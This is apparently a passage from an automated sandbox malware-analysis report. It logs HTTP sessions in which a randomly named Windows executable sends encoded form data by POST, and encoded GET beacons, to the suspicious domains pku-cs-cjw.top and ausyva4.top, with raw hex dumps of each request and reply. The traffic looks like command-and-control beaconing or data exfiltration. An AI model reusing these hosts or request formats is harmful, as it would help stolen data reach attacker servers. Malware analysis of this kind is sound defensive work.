                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9vIy347nknzZsF7n8kQFEouund5xCnGKGL9963zsLW7gpdjav5t8iOyZ8SF37shEqquoe%2FXaIjn3y10t4Ff%2FUYfoZXKgmqLu8siwP97th8Rea1qbVS3VG6P8dhfoCvpPz6nxaMgtkA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe83741dd843b9-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2262&min_rtt=2262&rtt_var=1131&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=462&delivery_rate=0&cwnd=190&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Jan 10, 2025 18:51:09.576248884 CET157INData Raw: 39 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72
                                                                  Data Ascii: 92<html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>0


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  1192.168.2.449737185.199.109.153801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:25.240576029 CET728OUTPOST /k3hn/ HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.pku-cs-cjw.top
                                                                  Referer: http://www.pku-cs-cjw.top/k3hn/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 59 59 74 4a 4e 31 74 49 6c 58 39 39 6a 70 6f 64 70 32 42 55 7a 2b 6e 58 30 4d 79 4c 6e 62 33 33 4e 62 57 4a 42 4d 75 61 4b 64 73 4b 34 65 5a 79 2f 6a 47 49 54 6f 53 4b 78 67 55 64 55 52 56 48 7a 6b 6a 43 37 49 35 4f 72 47 45 6e 76 77 69 4e 4b 54 35 79 6f 37 6d 36 7a 74 6e 4b 7a 4a 47 49 46 51 32 55 72 34 69 42 4d 47 69 6c 61 77 43 42 78 31 33 74 4d 79 6e 59 72 6f 30 47 41 79 79 2f 54 56 39 59 62 61 42 50 49 42 74 49 76 35 4d 56 56 4d 63 35 51 6d 38 32 41 54 70 46 59 5a 39 79 77 4e 39 42 77 6e 32 75 61 48 43 30 4c 57 55 34 4d 47 59 76 32 67 3d 3d
                                                                  Data Ascii: 3h=Qb19kBUolZZxYYtJN1tIlX99jpodp2BUz+nX0MyLnb33NbWJBMuaKdsK4eZy/jGIToSKxgUdURVHzkjC7I5OrGEnvwiNKT5yo7m6ztnKzJGIFQ2Ur4iBMGilawCBx13tMynYro0GAyy/TV9YbaBPIBtIv5MVVMc5Qm82ATpFYZ9ywN9Bwn2uaHC0LWU4MGYv2g==
                                                                  Jan 10, 2025 18:51:25.763183117 CET488INHTTP/1.1 405 Method Not Allowed
                                                                  Connection: close
                                                                  Content-Length: 131
                                                                  Server: Varnish
                                                                  Retry-After: 0
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 10 Jan 2025 17:51:25 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-nyc-kteb1890092-NYC
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531486.629736,VS0,VE0
                                                                  X-Fastly-Request-ID: 26b6bd954801d499902934a1fe430e6f3823229f
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  2192.168.2.449745185.199.109.153801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:27.931122065 CET748OUTPOST /k3hn/ HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.pku-cs-cjw.top
                                                                  Referer: http://www.pku-cs-cjw.top/k3hn/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 61 34 39 4a 4d 55 74 49 6e 33 39 38 76 4a 6f 64 6a 57 42 51 7a 2b 72 58 30 4a 57 69 6e 70 6a 33 4f 37 47 4a 41 4f 57 61 47 39 73 4b 73 4f 5a 7a 37 6a 47 50 54 6f 65 73 78 68 6f 64 55 52 42 48 7a 67 6e 43 37 35 35 50 71 57 45 6c 67 51 69 4c 4a 6a 35 79 6f 37 6d 36 7a 74 6a 67 7a 4a 4f 49 47 6c 6d 55 6f 62 36 65 46 6d 69 6b 4b 67 43 42 6d 46 33 70 4d 79 6e 32 72 73 56 4f 41 77 61 2f 54 51 52 59 43 75 31 4f 43 42 74 4f 77 70 4d 4c 62 38 42 67 53 33 35 49 47 7a 35 70 59 49 4a 57 34 72 77 62 68 57 58 35 49 48 6d 48 57 52 64 4d 42 46 6c 6d 74 73 52 79 39 6b 71 38 50 66 36 6d 47 45 50 4c 56 50 74 56 43 56 34 3d
                                                                  Data Ascii: 3h=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinpj3O7GJAOWaG9sKsOZz7jGPToesxhodURBHzgnC755PqWElgQiLJj5yo7m6ztjgzJOIGlmUob6eFmikKgCBmF3pMyn2rsVOAwa/TQRYCu1OCBtOwpMLb8BgS35IGz5pYIJW4rwbhWX5IHmHWRdMBFlmtsRy9kq8Pf6mGEPLVPtVCV4=
                                                                  Jan 10, 2025 18:51:28.304838896 CET488INHTTP/1.1 405 Method Not Allowed
                                                                  Connection: close
                                                                  Content-Length: 131
                                                                  Server: Varnish
                                                                  Retry-After: 0
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 10 Jan 2025 17:51:28 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740078-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531488.259555,VS0,VE0
                                                                  X-Fastly-Request-ID: 6ad5ae5d9f88c927a5c7f4e84602aa5492b0689b
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  3192.168.2.449763185.199.109.153801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:30.529994965 CET10830OUTPOST /k3hn/ HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 10299
                                                                  Connection: close
                                                                  Origin: http://www.pku-cs-cjw.top
                                                                  Referer: http://www.pku-cs-cjw.top/k3hn/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 51 62 31 39 6b 42 55 6f 6c 5a 5a 78 61 34 39 4a 4d 55 74 49 6e 33 39 38 76 4a 6f 64 6a 57 42 51 7a 2b 72 58 30 4a 57 69 6e 70 37 33 4f 4a 2b 4a 42 70 36 61 49 64 73 4b 7a 2b 5a 32 37 6a 48 54 54 6f 57 6f 78 68 6c 67 55 53 35 48 7a 44 76 43 73 37 52 50 6b 57 45 6c 69 51 69 4b 4b 54 34 32 6f 37 32 32 7a 74 54 67 7a 4a 4f 49 47 69 65 55 38 34 69 65 44 6d 69 6c 61 77 43 64 78 31 33 52 4d 79 2f 41 72 71 4a 65 41 41 36 2f 55 77 42 59 5a 39 64 4f 66 78 74 4d 7a 70 4e 59 62 38 4e 46 53 7a 59 35 47 77 6c 48 59 49 39 57 37 76 4e 66 2b 6b 58 59 63 68 32 68 4e 53 70 4d 59 6c 67 6e 71 39 64 51 73 48 4c 6b 61 4d 36 76 46 54 71 62 42 38 6b 58 66 79 36 58 56 68 54 6c 55 66 68 4b 58 4e 38 4d 57 48 38 4c 57 4b 49 57 43 51 42 59 66 47 77 33 5a 75 67 47 6a 4f 4f 45 77 6d 5a 51 31 35 6b 76 65 55 49 33 55 54 6b 31 31 37 54 62 66 50 70 47 66 4f 6b 6a 4f 4f 61 2b 47 49 76 61 34 66 6f 4e 4e 69 4f 39 4b 65 7a 74 38 67 62 39 69 57 34 68 36 52 6d 53 42 79 70 58 69 75 79 44 37 39 69 5a 4f 63 59 59 4e 77 6f 4d 39 77 58 [TRUNCATED]
                                                                  Data Ascii: 3h=Qb19kBUolZZxa49JMUtIn398vJodjWBQz+rX0JWinp73OJ+JBp6aIdsKz+Z27jHTToWoxhlgUS5HzDvCs7RPkWEliQiKKT42o722ztTgzJOIGieU84ieDmilawCdx13RMy/ArqJeAA6/UwBYZ9dOfxtMzpNYb8NFSzY5GwlHYI9W7vNf+kXYch2hNSpMYlgnq9dQsHLkaM6vFTqbB8kXfy6XVhTlUfhKXN8MWH8LWKIWCQBYfGw3ZugGjOOEwmZQ15kveUI3UTk117TbfPpGfOkjOOa+GIva4foNNiO9Kezt8gb9iW4h6RmSBypXiuyD79iZOcYYNwoM9wXMNTKpXCZc7/CZ4Cdh2SGh7pgbrUkcbuzBoGgHhOZzl05+6Gl2XyDD3+a94p0GbAIGY4FpL/6fTSZMFvyuG4fQfLMHqwq+F+6rAeJLW73x0mIPdXWrsjTtpuE2WVkNl5NlSfAAQEd4Eeu7awmqjnKmZtZFtd4M89seMYaxl9jo281ne0bLutv+nC8bMTNdIvAmKGJGHecSwnGlF3T01Eyx93xJWN7DsSZcZBNn/gmz6l4vc2R6EDlxDFHNFLlUZKCJEk7TujZy+Z76SCXVR5jHchJdZqxqkZi9QFhyndBkWJ3mpMmprkV+PpiO2b/2kRtxqQufltT0gfD5RxSWhWLxlHTCuEeBUhq5NWrvCrySIL/tfMuyH0J1fRuUt6LfHuft/9CB704BFUi+aOr+ugKkE7ljtyCasnMq8b0oNSGBF52d8uaWDK62biQPDVP191NhX3EUQFhMTaCBfJ3Fnxm8vzBfDe4femSQ6JVJniXwrk2wFxZnlI1QL+ZCkvgyZDl0QB1aWE965XkVZqoF6gX3BBYRw7BlEj97HYiaKo+/IEnV4uHoM/1fQxm8u9D6q9xc5L3gweiCduGvDKqWHdyDtxVmLFRJ3/l5kj1aJCCK5c1ownE6W/YHl0zv2kS6N4zsAq6FxrkIG2WeV9VixjSdgadABvMeW7MjK [TRUNCATED]
                                                                  Jan 10, 2025 18:51:30.963881969 CET488INHTTP/1.1 405 Method Not Allowed
                                                                  Connection: close
                                                                  Content-Length: 131
                                                                  Server: Varnish
                                                                  Retry-After: 0
                                                                  Accept-Ranges: bytes
                                                                  Date: Fri, 10 Jan 2025 17:51:30 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740075-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531491.920835,VS0,VE0
                                                                  X-Fastly-Request-ID: 02f7660282327de081f86e4561557be3514c5bc3
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                  Data Ascii: <html><head><title>405 Not Allowed</title></head><body bgcolor="white"><center><h1>405 Not Allowed</h1></center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  4192.168.2.449781185.199.109.153801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:33.083363056 CET460OUTGET /k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81kIy3BeJTiV4odLQ2svXpZKiEE3Qz4K+Ay4=&Ol=yN0LtN-HDTPXX HTTP/1.1
                                                                  Host: www.pku-cs-cjw.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Language: en-us
                                                                  Connection: close
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Jan 10, 2025 18:51:33.587296963 CET799INHTTP/1.1 301 Moved Permanently
                                                                  Connection: close
                                                                  Content-Length: 162
                                                                  Server: GitHub.com
                                                                  Content-Type: text/html
                                                                  X-GitHub-Request-Id: 69FB:23DB58:ED424C:FF13B3:67815E25
                                                                  Accept-Ranges: bytes
                                                                  Age: 0
                                                                  Date: Fri, 10 Jan 2025 17:51:33 GMT
                                                                  Via: 1.1 varnish
                                                                  X-Served-By: cache-ewr-kewr1740058-EWR
                                                                  X-Cache: MISS
                                                                  X-Cache-Hits: 0
                                                                  X-Timer: S1736531494.530886,VS0,VE11
                                                                  Vary: Accept-Encoding
                                                                  X-Fastly-Request-ID: a39cf2d8f43ae20cd4c13ffc3bf82c2742bbe856
                                                                  Location: http://pku-cs-cjw.top/k3hn/?3h=dZddn2QnmIt3Z4ttbkFYhAUU7sI66h1hr8Xg5sy2kai1E7eSB/izKfIU3bxH1QSpc7GJ9Hdmeil28QjfyJs81kIy3BeJTiV4odLQ2svXpZKiEE3Qz4K+Ay4=&Ol=yN0LtN-HDTPXX
                                                                  Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                  Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>nginx</center></body></html>


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  5192.168.2.449811104.21.48.233801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:39.032830954 CET719OUTPOST /al74/ HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 199
                                                                  Connection: close
                                                                  Origin: http://www.ausyva4.top
                                                                  Referer: http://www.ausyva4.top/al74/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 78 64 31 54 45 6a 4b 61 7a 66 77 42 6e 6a 57 78 55 50 68 77 63 54 4c 44 55 36 6a 42 61 74 52 41 76 62 76 45 5a 48 55 39 72 32 68 63 63 54 39 72 79 62 55 44 30 4d 47 4c 6c 6e 41 79 31 36 58 53 2b 49 6c 53 45 33 54 48 75 42 49 5a 66 37 54 6f 63 78 76 34 52 5a 2b 66 75 42 66 76 48 66 37 49 37 47 48 57 49 37 6d 35 58 6e 48 53 5a 5a 4b 38 4b 6e 65 2b 65 59 66 67 49 4e 37 64 35 4d 4d 32 57 67 39 43 6a 73 6e 79 6e 37 74 62 50 46 62 38 36 35 78 50 33 6f 64 49 32 6c 53 71 31 4c 78 77 50 42 4f 59 59 47 49 4b 66 52 78 51 6e 66 74 4a 2b 49 30 41 32 41 3d 3d
                                                                  Data Ascii: 3h=4DLMdNWNjQmPxd1TEjKazfwBnjWxUPhwcTLDU6jBatRAvbvEZHU9r2hccT9rybUD0MGLlnAy16XS+IlSE3THuBIZf7Tocxv4RZ+fuBfvHf7I7GHWI7m5XnHSZZK8Kne+eYfgIN7d5MM2Wg9Cjsnyn7tbPFb865xP3odI2lSq1LxwPBOYYGIKfRxQnftJ+I0A2A==
                                                                  Jan 10, 2025 18:51:39.910972118 CET1176INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:39 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6DdqZy1b9Iu0eSYQrryBoM219Yn3%2FYIQusgeGDqw%2FPThWl6z%2BL2MlvbWu2Voz7JoD%2BZA3v1TAtL0JZobUX49DdyQcC4M8GT6PHiB%2B4PF5QuZBOmFIBQsY33CQMgGpU3MpP8%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe84312dc54328-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=46143&min_rtt=46143&rtt_var=23071&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=719&delivery_rate=0&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 31 35 38 0d 0a 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb b5 22 96 90 83 b6 a2 50 b5 e8 0a 7a 4c 9b 69 13 4c 33 25 3b db 65 ff bd 74 ed 4a 29 78 c9 cb 64 e6 7b 4c 78 ea 62 fa 7a 5f 7c 2d 66 f0 58 3c cf 61 f1 71 37 7f ba 87 cb 01 e2 d3 ac 78 40 9c 16 d3 df ce 68 98 21 ce 5e 2e 75 bf a7 9c 6c 43 ab 64 ac 56 e2 25 90 1e 67 63 78 61 81 07 ae a2 55 f8 fb a8 b0 1d e9 f7 d4 92 6d 73 d0 15 45 a1 a4 95 cb cf 09 97 6b 85 c7 76 bf 07 ef 9c 52 03 6b 4e 20 8e c0 c7 15 c7 3d 45 4f 71 45 43 b5 4c a8 fb bd 45 20 53 12 24 da 71 12 10 e7 4b d8 52 59 9a 0d 81 89 f6 c0 84 ca 52 cb af 39 04 ae 7d dc 80 8f 6b 4e 5b 23 9e 23 08 43 55 76 6e 85 33 f1 1b 1a ae 60 4f a9 81 6d b5 72 17 0a 77 87 a5 c5 2c 03 b5 97 d4 9e 56 7f bc cd 27 0a c5 1e 4b 27 b2 9b 20 d6 75 3d 34 55 d9 ec cd 78 28 bc 43 13 6e c6 d8 8d e1 11 ee 2c de 29 ed 29 9d ba 84 8a ad 6f 68 60 ea 72 10 d9 52 fe 1f 3a 35 42 a7 e0 28 1b 5d 63 96 63 9e 43 96 4f ae f3 c9 d5 ed 19 8a 7f 5f 70 09 f5 82 6b 4a [TRUNCATED]
                                                                  Data Ascii: f158uAK1{;"PzLiL3%;etJ)xd{Lxbz_|-fX<aq7x@h!^.ulCdV%gcxaUmsEkvRkN =EOqECLE S$qKRYR9}kN[##CUvn3`Omrw,V'K' u=4Ux(Cn,))oh`rR:5B(]ccCO_pkJdarIwt.8<sW210


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  6192.168.2.449824104.21.48.233801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
                                                                  Jan 10, 2025 18:51:41.573720932 CET739OUTPOST /al74/ HTTP/1.1
                                                                  Host: www.ausyva4.top
                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                  Accept-Encoding: gzip, deflate, br
                                                                  Accept-Language: en-us
                                                                  Content-Type: application/x-www-form-urlencoded
                                                                  Cache-Control: max-age=0
                                                                  Content-Length: 219
                                                                  Connection: close
                                                                  Origin: http://www.ausyva4.top
                                                                  Referer: http://www.ausyva4.top/al74/
                                                                  User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; fr; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 ( .NET CLR 3.5.30729)
                                                                  Data Raw: 33 68 3d 34 44 4c 4d 64 4e 57 4e 6a 51 6d 50 2b 66 68 54 42 41 53 61 69 50 78 7a 37 7a 57 78 65 76 67 33 63 53 33 44 55 37 57 61 61 37 4a 41 6f 36 66 45 58 6d 55 39 71 32 68 63 57 7a 39 71 74 4c 55 4b 30 4d 43 70 6c 6d 38 79 31 36 54 53 2b 49 31 53 44 41 48 41 76 52 49 68 55 62 54 6d 66 42 76 34 52 5a 2b 66 75 42 4c 56 48 66 6a 49 37 79 37 57 4a 61 6d 32 4c 33 48 52 4e 4a 4b 38 42 48 65 69 65 59 66 43 49 4d 6d 4b 35 50 6b 32 57 67 4e 43 69 2b 50 78 70 37 74 5a 58 6c 61 59 73 38 41 68 79 74 34 55 78 46 4f 64 77 5a 31 32 4b 48 44 43 4a 33 70 64 4e 52 56 6a 36 59 6b 39 7a 4c 4a 4a 74 47 55 53 45 6b 54 76 32 54 6d 54 58 35 43 63 72 74 6f 4d 49 46 38 3d
                                                                  Data Ascii: 3h=4DLMdNWNjQmP+fhTBASaiPxz7zWxevg3cS3DU7Waa7JAo6fEXmU9q2hcWz9qtLUK0MCplm8y16TS+I1SDAHAvRIhUbTmfBv4RZ+fuBLVHfjI7y7WJam2L3HRNJK8BHeieYfCIMmK5Pk2WgNCi+Pxp7tZXlaYs8Ahyt4UxFOdwZ12KHDCJ3pdNRVj6Yk9zLJJtGUSEkTv2TmTX5CcrtoMIF8=
                                                                  Jan 10, 2025 18:51:42.298978090 CET1161INHTTP/1.1 404 Not Found
                                                                  Date: Fri, 10 Jan 2025 17:51:42 GMT
                                                                  Content-Type: text/html
                                                                  Transfer-Encoding: chunked
                                                                  Connection: close
                                                                  cf-cache-status: DYNAMIC
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AJg1p2ocmgRBzQ9rbfF4RY9zgLdVYL9TVZrmJ17Zv2gCpK%2BNflZ9PdcCY4X6zXU28FlUVD%2FINT0yRmxAUSx2zdcYBcA4p43LZTjElFpUNczrget6kmxHt3o0sm%2BCZtLd3KM%3D"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8ffe84400a37c34d-EWR
                                                                  Content-Encoding: gzip
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=21348&min_rtt=21348&rtt_var=10674&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=739&delivery_rate=0&cwnd=250&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                  Data Raw: 31 36 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 75 91 41 4b 03 31 10 85 ef 85 fe 87 d1 7b 3b bb 65 45 28 21 07 6d 45 a1 6a d1 2d e8 31 6d a6 4d 30 cd 94 ec 6c 97 fd f7 d2 b5 2b 45 f0 92 97 c9 cc f7 98 f0 d4 d5 ec f5 be fc 5c ce e1 b1 7c 5e c0 72 75 b7 78 ba 87 eb 11 e2 d3 bc 7c 40 9c 95 b3 9f ce 64 9c 21 ce 5f ae f5 70 a0 9c ec 43 a7 64 ac 56 e2 25 90 2e b2 02 5e 58 e0 81 eb 68 15 fe 3c 2a ec 46 86 03 b5 66 db 9e 74 43 51 28 69 e5 f2 bf 84 cb b5 c2 73 7b 38 80 77 4e a9 85 2d 27 10 47 e0 e3 86 e3 91 a2 a7 b8 a1 b1 5a 27 d4 c3 c1 32 90 a9 08 12 1d 38 09 88 f3 15 ec a9 aa cc 8e c0 44 7b 62 42 6d a9 e3 b7 1c 02 37 3e ee c0 c7 2d a7 bd 11 cf 11 84 a1 ae 7a b7 d2 99 f8 05 2d d7 70 a4 d4 c2 be de b8 2b 85 87 d3 d2 62 d6 81 ba 4b ea 4e ab 57 6f 8b a9 42 b1 e7 d2 89 1c a6 88 4d d3 8c 4d 5d b5 47 53 8c 85 0f 68 c2 6d 81 fd 18 9e e1 de e2 9d d2 91 d2 a5 4b a8 d9 fa 96 46 a6 a9 46 91 2d e5 ff a1 33 23 74 09 4e b2 c9 0d 66 39 e6 39 64 f9 f4 26 9f 16 93 3f 28 fe 7e c1 25 d4 4b 6e 28 91 85 75 0b 1f ca 25 dd a7 22 14 [TRUNCATED]
                                                                  Data Ascii: 161uAK1{;eE(!mEj-1mM0l+E\|^rux|@d!_pCdV%.^Xh<*FftCQ(is{8wN-'GZ'28D{bBm7>-z-p+bKNWoBMM]GShmKFF-3#tNf99d&?(~%Kn(u%"w>E7J10


                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                  7192.168.2.449835104.21.48.233801780C:\Program Files (x86)\sEdvIAdlmOPUOgTxrFNynpyRXnFWaMeejzUlOBxHoX\wdFhguqpcrad.exe
                                                                  TimestampBytes transferredDirectionData
